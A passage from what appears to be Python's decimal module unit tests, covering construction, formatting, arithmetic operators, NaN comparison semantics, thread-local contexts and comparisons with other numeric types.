d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
